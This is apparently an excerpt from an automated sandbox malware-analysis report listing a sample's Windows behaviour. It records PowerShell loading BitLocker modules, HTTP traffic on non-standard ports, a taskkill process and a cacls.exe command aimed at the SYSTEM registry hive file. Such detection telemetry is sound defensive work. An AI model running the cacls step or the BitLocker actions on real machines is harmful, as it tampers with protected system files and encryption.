Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 1490
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49710

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
